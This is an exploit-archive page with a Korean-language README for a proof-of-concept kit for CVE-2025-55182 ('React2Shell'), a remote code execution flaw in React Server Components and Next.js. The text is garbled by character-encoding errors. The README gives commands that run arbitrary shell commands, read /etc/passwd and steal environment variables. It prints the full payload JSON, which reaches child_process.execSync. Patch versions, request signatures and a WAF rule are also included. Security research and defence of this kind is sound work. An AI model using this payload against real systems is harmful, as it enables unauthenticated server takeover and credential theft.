Share
## https://sploitus.com/exploit?id=C3DAD439-6874-59C4-91BE-2FBF9334A154
# CVE-2025-55182 (React2Shell) PoC νκ²½
> **κ²½κ³ **: μ΄ νλ‘μ νΈλ **보μ μ°κ΅¬ λ° κ΅μ‘ λͺ©μ **μΌλ‘λ§ μ¬μ©ν΄μΌ ν©λλ€.
> νκ° μμ΄ νμΈμ μμ€ν
μ μ¬μ©νλ κ²μ λΆλ²μ
λλ€.
## μ·¨μ½μ κ°μ
| νλͺ© | λ΄μ© |
|------|------|
| **CVE ID** | CVE-2025-55182 |
| **λ³μΉ** | React2Shell |
| **CVSS μ μ** | 10.0 (Critical - μ΅λ μ¬κ°λ) |
| **μ·¨μ½μ μ ν** | Unauthenticated Remote Code Execution (RCE) |
| **λ°κ²¬μ** | Lachlan Davidson |
| **곡κ°μΌ** | 2025λ
12μ 3μΌ |
## μν₯λ°λ λ²μ
### React ν¨ν€μ§
- `react-server-dom-webpack`: 19.0, 19.1.0, 19.1.1, 19.2.0
- `react-server-dom-parcel`: 19.0, 19.1.0, 19.1.1, 19.2.0
- `react-server-dom-turbopack`: 19.0, 19.1.0, 19.1.1, 19.2.0
### Next.js
- 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6
## νλ‘μ νΈ κ΅¬μ‘°
```
CVE-2025-55182/
βββ README.md # μ΄ νμΌ
βββ vulnerable-server/ # μ·¨μ½ν Next.js μλ²
β βββ package.json
β βββ next.config.js
β βββ tsconfig.json
β βββ app/
β βββ layout.tsx
β βββ page.tsx
β βββ actions.ts # Server Action
βββ exploit/ # 곡격 PoC
β βββ package.json
β βββ poc.js # RCE 곡격 μ€ν¬λ¦½νΈ
β βββ check-vulnerability.js # μ·¨μ½μ μ²΄ν¬ μ€ν¬λ¦½νΈ
βββ React2Shell-CVE-2025-55182-original-poc/ # μλ³Έ PoC μ°Έμ‘°
```
## λΉ λ₯Έ μμ
### 1. μ·¨μ½ν μλ² μ€μ λ° μ€ν
```bash
# μμ‘΄μ± μ€μΉ
cd vulnerable-server
npm install
# κ°λ° λͺ¨λλ‘ μλ² μ€ν (ν¬νΈ 3000)
npm run dev
```
μλ²κ° http://localhost:3000 μμ μ€νλ©λλ€.
### 2. 곡격 PoC μ€ν
μ ν°λ―Έλμμ:
```bash
# μμ‘΄μ± μ€μΉ
cd exploit
npm install
# μ·¨μ½μ 체ν¬
npm run check
# PoC μ€ν (ν
μ€νΈ λͺ¨λ)
npm run exploit
```
## 곡격 PoC μ¬μ©λ²
### κΈ°λ³Έ ν
μ€νΈ (console.log)
```bash
node poc.js -m test
```
### κ³μ°κΈ° μ€ν (RCE μ¦λͺ
κ΅λ£°)
```bash
# macOS
node poc.js -m calc
# Linux
node poc.js -m calc -c linux
# Windows
node poc.js -m calc -c windows
```
### μμ€ν
λͺ
λ Ή μ€ν (RCE)
```bash
# id λͺ
λ Ή μ€ν
node poc.js -t http://localhost:3000 -m rce -c "id"
# νμΌ μ½κΈ°
node poc.js -t http://localhost:3000 -m rce -c "cat /etc/passwd"
# μμ€ν
μ 보
node poc.js -t http://localhost:3000 -m rce -c "uname -a"
```
### νκ²½ λ³μ νμ·¨
```bash
node poc.js -t http://localhost:3000 -m env
```
### μ¬μ©μ μ μ μ½λ μ€ν
```bash
node poc.js -m custom -c "require('fs').readFileSync('/etc/passwd').toString()"
```
## κΈ°μ μ λΆμ
### μ·¨μ½μ κ·Όλ³Έ μμΈ
React Server Componentsμ Flight νλ‘ν μ½μμ ν΄λΌμ΄μΈνΈκ° μ μ‘ν λ°μ΄ν°λ₯Ό μμ§λ ¬νν λ λ°μν©λλ€.
```
requireModule ν¨μκ° ν΄λΌμ΄μΈνΈκ° μ μ‘ν μμ±λͺ
μ κ²μ¦ μμ΄ μ λ’°
β moduleExports[metadata[NAME]] μ€ν μ hasOwnProperty κ²μ¬ μμ
β νλ‘ν νμ
μ²΄μΈ μ‘°μ κ°λ₯ (Server-Side Prototype Pollution)
β Function μμ±μ νλ β RCE
```
### 곡격 체μΈ
1. **`$@x` μμ§λ ¬ν νΈλ¦¬κ±°** - Chunk κ°μ²΄ μ°Έμ‘° νλ
2. **Promise 체μ΄λ μ
μ©** - `.then` λ©μλλ₯Ό κ°μ§ thenable κ°μ²΄ μ£Όμ
3. **κ°μ§ Chunk κ°μ²΄λ‘ νμ μ¬μ§μ
** - `status: resolved_model` μ€μ
4. **κ°μ ― μ²΄μΈ κ΅¬μ±** - `_response`, `_formData` λ± νμ©
5. **Function μμ±μ νλ** - `$1:constructor:constructor`
6. **μμ μ½λ μ€ν** - `new Function(μ
μ±μ½λ)` μ€ν
### νμ΄λ‘λ ꡬ쑰
```javascript
{
'0': '$1',
'1': {
'status': 'resolved_model',
'reason': 0,
'_response': '$4',
'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
'then': '$2:then'
},
'2': '$@3',
'3': [],
'4': {
'_prefix': 'process.mainModule.require("child_process").execSync("id")//',
'_formData': {
'get': '$3:constructor:constructor'
},
'_chunks': '$2:_response:_chunks'
}
}
```
## ν¨μΉ λ°©λ²
### Next.js μ
κ·Έλ μ΄λ
```bash
# 15.0.x μ¬μ©μ
npm install next@15.0.5
# 15.1.x μ¬μ©μ
npm install next@15.1.9
# 15.2.x μ¬μ©μ
npm install next@15.2.6
```
### React ν¨ν€μ§ μ
κ·Έλ μ΄λ
```bash
npm install react-server-dom-webpack@19.0.1
npm install react-server-dom-parcel@19.0.1
npm install react-server-dom-turbopack@19.0.1
```
## νμ§ λ°©λ²
### HTTP μμ² νΉμ§
- `POST` μμ²
- `Next-Action` ν€λ μ‘΄μ¬
- `multipart/form-data` νμ
- λ³Έλ¬Έμ `$@`, `resolved_model`, `constructor` λ±μ ν¨ν΄
### WAF κ·μΉ μμ
```
# μμ¬μ€λ¬μ΄ Flight νμ΄λ‘λ νμ§
SecRule REQUEST_HEADERS:Next-Action "@rx ." \
"id:1001,phase:2,deny,status:403,\
chain"
SecRule REQUEST_BODY "@rx constructor.*constructor" \
"t:lowercase"
```
## μ°Έκ³ μλ£
- [React 곡μ λΈλ‘κ·Έ](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [μλ³Έ PoC (Lachlan Davidson)](https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc)
- [Datadog Security Labs λΆμ](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)
- [Wiz λΆμ](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
## λΌμ΄μ μ€
μ΄ νλ‘μ νΈλ **κ΅μ‘ λ° μ°κ΅¬ λͺ©μ **μΌλ‘λ§ μ 곡λ©λλ€.
μ
μμ μΈ λͺ©μ μΌλ‘μ μ¬μ©μ κΈμ§ν©λλ€.
---
**μ£Όμ**: μ€μ νκ²½μμ μ΄ μ·¨μ½μ μ λ°κ²¬νλ€λ©΄ μ¦μ ν¨μΉνμΈμ.
κ³΅κ²©μ΄ νμΈλ κ²½μ° λ³΄μ νμ λ³΄κ³ νκ³ μΉ¨ν΄ μ‘°μ¬λ₯Ό μννμΈμ.